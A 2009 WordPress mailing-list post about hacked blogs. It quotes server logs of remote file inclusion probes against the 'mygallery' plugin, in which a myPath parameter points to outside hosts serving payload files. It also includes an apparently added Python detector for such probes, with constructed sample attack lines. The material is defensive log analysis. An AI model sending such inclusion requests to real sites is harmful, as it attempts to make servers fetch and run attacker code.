[wp-hackers] Hacked blogs

Peter van der Does peter at avirtualhome.com
Thu Mar 26 14:47:02 GMT 2009


On Thu, 26 Mar 2009 10:24:48 -0400
Dougal Campbell <dougal at gunters.org> wrote:

> Joost de Valk wrote:
> > Peter van der Does wrote:

> I don't see that particular request in my logs, but I see lots of
> attempts against a 'mygallery' plugin (which I don't have installed).
> They all get a 404, of course, but I'm guessing that this means that
> the 'mygallery' plugin needs to be looked at.
> 
>     78.111.71.6 - - [25/Mar/2009:22:25:49 +0000] "GET
>     /blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
>     HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
>     78.111.71.6 - - [25/Mar/2009:22:25:49 +0000] "GET
>     //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
>     HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
>     78.111.71.6 - - [25/Mar/2009:22:25:50 +0000] "GET
>     /blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://newsletter.security-zone.info//temp/images/Albid.txt?
>     HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
>     124.0.73.2 - - [26/Mar/2009:01:24:32 +0000] "GET
>     //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vietnamwingchun.com//fastidioid.txt?
>     HTTP/1.1" 404 28407 "-" "libwww-perl/5.805"
>     124.0.73.2 - - [26/Mar/2009:01:24:34 +0000] "GET
>     /blog/2007/01/16//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://vietnamwingchun.com//fastidioid.txt?
>     HTTP/1.1" 404 28407 "-" "libwww-perl/5.805"
> 
> 
> Though these particular examples all used libwww-perl as the
> useragent, other hack attempt entries in my logs masqueraded as
> normal MSIE browsers. Personally, I think blocking the LWP useragent
> outright is a bad idea, because plenty of legitimate tools use it.
> It's like blocking 'curl' or 'wget'.
> 

First off, I have to correct myself: libwww-perl does show up in my
logs, my apologies.

As for blocking it: I don't believe it's a bad idea, as the only tool I
can think of that in theory should be able to access my blog would be an
RSS reader. My main RSS feed is through Google, so only an RSS feed for
comments is accessed on my site, and then the chance of somebody using a
Perl RSS reader is slim.

I just don't know of any other tool, written in Perl, that would have
to access my site. 


-- 
Peter van der Does

GPG key: E77E8E98

WordPress Plugin Developer
http://blog.avirtualhome.com

GetDeb Package Builder/GetDeb Site Coder
http://www.getdeb.net - Software you want for Ubuntu
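
The quoted log entries share a pattern that does not depend on the user agent: a query parameter whose value is a remote URL. The following is an added example, not part of the original thread, that flags such requests in an Apache combined-format log and groups them by targeted plugin. The sample log lines, IP addresses and hosts are constructed, and the function names are hypothetical.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl

# Constructed sample lines (combined log format, documentation IPs and hosts).
SAMPLE_LOG = '''\
192.0.2.10 - - [25/Mar/2009:22:25:49 +0000] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://files.example.net/a.txt? HTTP/1.1" 404 28393 "-" "libwww-perl/5.805"
192.0.2.77 - - [26/Mar/2009:01:24:32 +0000] "GET /blog/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http%3A%2F%2Ffiles.example.org%2Fb.txt%3F HTTP/1.1" 404 28407 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
198.51.100.5 - - [26/Mar/2009:02:00:00 +0000] "GET /blog/feed/ HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
198.51.100.9 - - [26/Mar/2009:02:05:00 +0000] "GET /blog/?s=http+proxy HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
'''

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.I)   # checked after URL-decoding
PLUGIN_RE = re.compile(r'/wp-content/plugins/([^/]+)/')


def find_rfi_probes(log_text):
    """Return one record per request that carries a remote URL in a query parameter."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Split by hand: urlsplit() would read the leading "//" as a host name.
        path, _, query = m['target'].partition('?')
        # parse_qsl() percent-decodes, so encoded "http%3A%2F%2F" is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                plugin = PLUGIN_RE.search(path)
                hits.append({'ip': m['ip'], 'param': name, 'ua': m['ua'],
                             'status': int(m['status']),
                             'plugin': plugin.group(1) if plugin else None})
                break
    return hits


def probes_by_plugin(hits):
    """Count flagged requests per targeted plugin directory."""
    return Counter(h['plugin'] for h in hits)


if __name__ == '__main__':
    for hit in find_rfi_probes(SAMPLE_LOG):
        print(hit)
    print(probes_by_plugin(find_rfi_probes(SAMPLE_LOG)))
```

The legitimate libwww-perl feed request is not flagged, while the probe sent with an MSIE user agent is.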

